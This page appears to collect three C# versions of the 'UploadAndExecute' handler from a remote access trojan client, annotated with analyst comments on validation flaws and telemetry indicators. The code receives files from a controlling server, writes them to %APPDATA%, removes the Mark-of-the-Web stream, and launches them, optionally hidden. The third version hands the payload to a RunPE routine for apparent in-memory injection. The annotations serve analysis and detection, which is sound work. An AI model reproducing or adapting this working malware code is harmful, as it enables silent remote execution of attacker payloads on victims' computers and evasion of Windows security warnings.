Exemple #1
        /// <summary>
        /// Handles an <c>UploadAndExecute</c> packet from the server: appends the received block to a file
        /// under the per-user ApplicationData folder and, when the final block arrives, starts that file.
        /// </summary>
        /// <remarks>
        /// Analyst notes, limited to what this method shows: the file name, block data and RunHidden flag all
        /// come from the packet and get no validation here beyond a two-byte header test; the Zone.Identifier
        /// alternate data stream is removed before launch; every outcome is reported back in a Status packet.
        /// A non-browser process writing a file under %APPDATA%, deleting its Zone.Identifier stream and then
        /// starting it is the observable sequence to look for in endpoint telemetry.
        /// </remarks>
        /// <param name="command">Packet carrying FileName, Block, CurrentBlock, MaxBlocks and RunHidden.</param>
        /// <param name="client">Client object handed to <c>Status.Execute</c> for the replies.</param>
        public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
        {
            // Target path = ApplicationData + packet-supplied name. FileName is not checked here, and
            // Path.Combine returns its second argument unchanged when that argument is rooted, so the
            // written file is not guaranteed to sit under %APPDATA%.
            string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                                           command.FileName);

            try
            {
                // Header test on the first block only. As written it throws only when neither byte matches
                // 'M' / 'Z'; a block with just one matching byte passes.
                // NOTE(review): Block's length is not checked before indexing; presumably a short block
                // raises an index exception that lands in the catch below - confirm Block's type.
                if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z')
                {
                    throw new Exception("No executable file");
                }

                // FileSplit is a project type not shown on this page; a new instance is created per block.
                FileSplit destFile = new FileSplit(filePath);

                // AppendBlock receives the block and its index; a false return is reported with LastError
                // and the handler stops without touching the file further.
                if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
                {
                    new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute(
                        client);
                    return;
                }

                if ((command.CurrentBlock + 1) == command.MaxBlocks) // final block received: launch the file
                {
                    // "<path>:Zone.Identifier" is the alternate data stream holding the Mark-of-the-Web zone
                    // information. DeleteFile is defined elsewhere - presumably removes the given path.
                    DeleteFile(filePath + ":Zone.Identifier");

                    ProcessStartInfo startInfo = new ProcessStartInfo();
                    if (command.RunHidden)
                    {
                        // Hidden window style and no console window when the server asks for it.
                        startInfo.WindowStyle    = ProcessWindowStyle.Hidden;
                        startInfo.CreateNoWindow = true;
                    }
                    // UseShellExecute is set to the same flag as RunHidden.
                    startInfo.UseShellExecute = command.RunHidden;
                    startInfo.FileName        = filePath;
                    Process.Start(startInfo);

                    new Packets.ClientPackets.Status("Executed File!").Execute(client);
                }
            }
            catch (Exception ex)
            {
                // Any exception (header test, append, process start) ends here: DeleteFile is called on the
                // target path and the exception message is sent back to the server.
                DeleteFile(filePath);
                new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
            }
        }
Exemple #2
        /// <summary>
        /// Handles an <c>UploadAndExecute</c> packet that carries the whole file at once: on a new thread,
        /// writes <c>FileBytes</c> to the per-user ApplicationData folder and starts the written file.
        /// </summary>
        /// <remarks>
        /// Analyst notes, limited to what this method shows: file name, content and RunHidden flag come from
        /// the packet; the Zone.Identifier alternate data stream is removed between the write and the launch;
        /// failures are reported with a fixed message, so the exception detail is discarded.
        /// </remarks>
        /// <param name="command">Packet carrying FileName, FileBytes and RunHidden.</param>
        /// <param name="client">Client object handed to <c>Status.Execute</c> for the replies.</param>
        public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
        {
            // The work runs on a freshly started thread, so this handler returns immediately.
            new Thread(new ThreadStart(() =>
            {
                byte[] fileBytes = command.FileBytes;
                // FileName is not checked here; Path.Combine returns its second argument unchanged when it
                // is rooted, so the written file is not guaranteed to sit under %APPDATA%.
                string tempFile  = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), command.FileName);

                try
                {
                    // Header test: as written it throws only when neither byte matches 'M' / 'Z'.
                    // A null or shorter-than-two-byte array raises inside the try and is handled by the
                    // bare catch below.
                    if (fileBytes[0] != 'M' && fileBytes[1] != 'Z')
                    {
                        throw new Exception("no pe file");
                    }

                    File.WriteAllBytes(tempFile, fileBytes);

                    // "<path>:Zone.Identifier" is the alternate data stream holding the Mark-of-the-Web zone
                    // information. DeleteFile is defined elsewhere - presumably removes the given path.
                    DeleteFile(tempFile + ":Zone.Identifier");

                    ProcessStartInfo startInfo = new ProcessStartInfo();
                    if (command.RunHidden)
                    {
                        // Hidden window style and no console window when the server asks for it.
                        startInfo.WindowStyle    = ProcessWindowStyle.Hidden;
                        startInfo.CreateNoWindow = true;
                    }
                    // UseShellExecute is set to the same flag as RunHidden.
                    startInfo.UseShellExecute = command.RunHidden;
                    startInfo.FileName        = tempFile;
                    Process.Start(startInfo);
                }
                catch
                {
                    // Bare catch: every failure is reduced to one fixed status string after DeleteFile is
                    // called on the target path.
                    DeleteFile(tempFile);
                    new Packets.ClientPackets.Status("Execution failed!").Execute(client);
                    return;
                }

                // Reached only when Process.Start returned without throwing.
                new Packets.ClientPackets.Status("Executed File!").Execute(client);
            })).Start();
        }
Exemple #3
        /// <summary>
        /// Handles an <c>UploadAndExecute</c> packet block by block through a <c>MemorySplit</c> and, once
        /// the final block arrives, dispatches on <c>command.Type</c>: "drop" writes the file and starts it,
        /// "self" and "cmd" pass the assembled bytes to <c>RunPE.Invoke</c>.
        /// </summary>
        /// <remarks>
        /// Analyst notes, limited to what this method shows: file name, data, Type and RunHidden come from the
        /// packet with no validation beyond a two-byte header test. Only the "drop" branch calls DropFile,
        /// removes the Zone.Identifier stream and uses Process.Start; the "self" and "cmd" branches call
        /// neither, so the file-write-then-launch sequence is absent from this method on those paths.
        /// MemorySplit and RunPE are project types not shown on this page.
        /// </remarks>
        /// <param name="command">Packet carrying FileName, Block, CurrentBlock, MaxBlocks, Type and RunHidden.</param>
        /// <param name="client">Client object handed to <c>Status.Execute</c> and to <c>RunPE.Invoke</c>.</param>
        public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
        {
            // FileName is not checked here; Path.Combine returns its second argument unchanged when it is
            // rooted, so the path is not guaranteed to sit under %APPDATA%.
            string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                                           command.FileName);

            try
            {
                // Header test on the first block only. As written it throws only when neither byte matches
                // 'M' / 'Z'; a block with just one matching byte passes.
                // NOTE(review): Block's length is not checked before indexing - confirm Block's type.
                if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z')
                {
                    throw new Exception("No executable file");
                }

                // A new MemorySplit is created for every block, keyed by the target path.
                // NOTE(review): by its name it presumably buffers blocks in memory - confirm in its source.
                MemorySplit destFile = new MemorySplit(filePath);

                // A false return is reported with LastError and the handler stops.
                if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
                {
                    new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute(
                        client);
                    return;
                }

                if ((command.CurrentBlock + 1) == command.MaxBlocks) // final block received: dispatch on Type
                {
                    if (command.Type == "drop")
                    {
                        // DropFile returns false on failure with the reason in LastError; presumably it
                        // writes the assembled data to filePath, which is started below.
                        if (!destFile.DropFile())
                        {
                            new Packets.ClientPackets.Status(string.Format("Drop failed: {0}", destFile.LastError)).Execute(
                                client);
                            return;
                        }

                        // "<path>:Zone.Identifier" is the alternate data stream holding the Mark-of-the-Web
                        // zone information. DeleteFile is defined elsewhere.
                        DeleteFile(filePath + ":Zone.Identifier");

                        ProcessStartInfo startInfo = new ProcessStartInfo();
                        if (command.RunHidden)
                        {
                            // Hidden window style and no console window when the server asks for it.
                            startInfo.WindowStyle    = ProcessWindowStyle.Hidden;
                            startInfo.CreateNoWindow = true;
                        }
                        // UseShellExecute is set to the same flag as RunHidden.
                        startInfo.UseShellExecute = command.RunHidden;
                        startInfo.FileName        = filePath;
                        Process.Start(startInfo);

                        new Packets.ClientPackets.Status("Executed File!").Execute(client);
                    }
                    else if (command.Type == "self")
                    {
                        // The assembled bytes are taken from the MemorySplit; null is reported and aborts.
                        byte[] dat = destFile.ToByteArray();
                        //File.WriteAllBytes("lol.exe", dat);
                        if (dat == null)
                        {
                            new Packets.ClientPackets.Status("Payload was null!").Execute(client);
                            return;
                        }
                        //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
                        //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "self", "" } });

                        // The bytes are Base64-encoded and passed with the strings "self" and "" plus the
                        // client. What RunPE.Invoke does with them is not visible here.
                        RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "self", "" }, client);
                    }
                    else if (command.Type == "cmd")
                    {
                        // Same flow as the "self" branch, with different mode strings.
                        byte[] dat = destFile.ToByteArray();
                        if (dat == null)
                        {
                            new Packets.ClientPackets.Status("Payload was null!").Execute(client);
                            return;
                        }
                        //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
                        //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "sys", "cmd" } });
                        // Passed with the strings "sys" and "cmd"; their meaning is defined by RunPE.
                        RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "sys", "cmd" }, client);
                    }
                    else
                    {
                        // Any other Type value is only reported; nothing is written or started.
                        new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
                    }
                }
            }
            catch (Exception ex)
            {
                // DeleteFile is called on the target path on every failure, including the branches that
                // never call DropFile. ex.ToString() sends the full exception text, stack trace included,
                // back to the server.
                DeleteFile(filePath);
                new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.ToString())).Execute(client);
                //MessageBox.Show(ex.ToString());
            }
        }